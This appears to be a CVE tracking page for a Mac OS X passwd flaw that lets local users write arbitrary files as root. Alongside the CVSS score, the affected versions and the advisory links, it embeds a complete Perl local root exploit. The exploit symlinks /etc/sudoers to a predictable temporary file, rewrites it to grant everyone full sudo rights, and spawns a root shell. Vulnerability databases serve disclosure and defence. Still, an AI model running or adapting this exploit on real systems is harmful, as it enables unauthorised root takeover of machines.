Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
passwd in Directory Services in Mac OS X 10.3.x before 10.3.9 and 10.4.x before 10.4.5 allows local users to create arbitrary world-writable files as root by specifying an alternate file in the password database option.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 1545
Publication date : 2006-02-28 23h00 +00:00
Author : vade79
EDB Verified : Yes
#!/usr/bin/perl
#
# /usr/bin/passwd[OSX]: local root exploit.
#
# by: vade79/v9 [email protected] (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fake_passwd="/tmp/xpasswd.$$";
$passwd_pid=($$ + 1);
$passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
$sudoers="/etc/sudoers";
sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
open(FP,">$fake_passwd")||pexit("couldn't open/write to $fake_passwd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
# milw0rm.com [2006-03-01]
Products Mentioned
Configuraton 0
Apple>>Mac_os_x >> Version 10.3
- Apple>>Mac_os_x >> Version 10.3 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.1
- Apple>>Mac_os_x >> Version 10.3.1 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.2
- Apple>>Mac_os_x >> Version 10.3.2 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.3
- Apple>>Mac_os_x >> Version 10.3.3 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.4
- Apple>>Mac_os_x >> Version 10.3.4 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.5
- Apple>>Mac_os_x >> Version 10.3.5 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.6
- Apple>>Mac_os_x >> Version 10.3.6 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.7
- Apple>>Mac_os_x >> Version 10.3.7 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.8
- Apple>>Mac_os_x >> Version 10.3.8 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.9
- Apple>>Mac_os_x >> Version 10.3.9 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4
- Apple>>Mac_os_x >> Version 10.4 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4.1
- Apple>>Mac_os_x >> Version 10.4.1 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4.2
- Apple>>Mac_os_x >> Version 10.4.2 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4.3
- Apple>>Mac_os_x >> Version 10.4.3 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4.4
- Apple>>Mac_os_x >> Version 10.4.4 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4.5
- Apple>>Mac_os_x >> Version 10.4.5 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3
- Apple>>Mac_os_x_server >> Version 10.3 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.1
- Apple>>Mac_os_x_server >> Version 10.3.1 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.2
- Apple>>Mac_os_x_server >> Version 10.3.2 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.3
- Apple>>Mac_os_x_server >> Version 10.3.3 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.4
- Apple>>Mac_os_x_server >> Version 10.3.4 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.5
- Apple>>Mac_os_x_server >> Version 10.3.5 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.6
- Apple>>Mac_os_x_server >> Version 10.3.6 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.7
- Apple>>Mac_os_x_server >> Version 10.3.7 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.8
- Apple>>Mac_os_x_server >> Version 10.3.8 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.3.9
- Apple>>Mac_os_x_server >> Version 10.3.9 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4
- Apple>>Mac_os_x_server >> Version 10.4 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4.1
- Apple>>Mac_os_x_server >> Version 10.4.1 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4.2
- Apple>>Mac_os_x_server >> Version 10.4.2 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4.3
- Apple>>Mac_os_x_server >> Version 10.4.3 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4.4
- Apple>>Mac_os_x_server >> Version 10.4.4 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4.5
- Apple>>Mac_os_x_server >> Version 10.4.5 (Open CPE detail)
References
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=400
Tags : third-party-advisory, x_refsource_IDEFENSE
Tags : third-party-advisory, x_refsource_IDEFENSE
http://www.securityfocus.com/archive/1/426535/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
2025©
tesweb SA
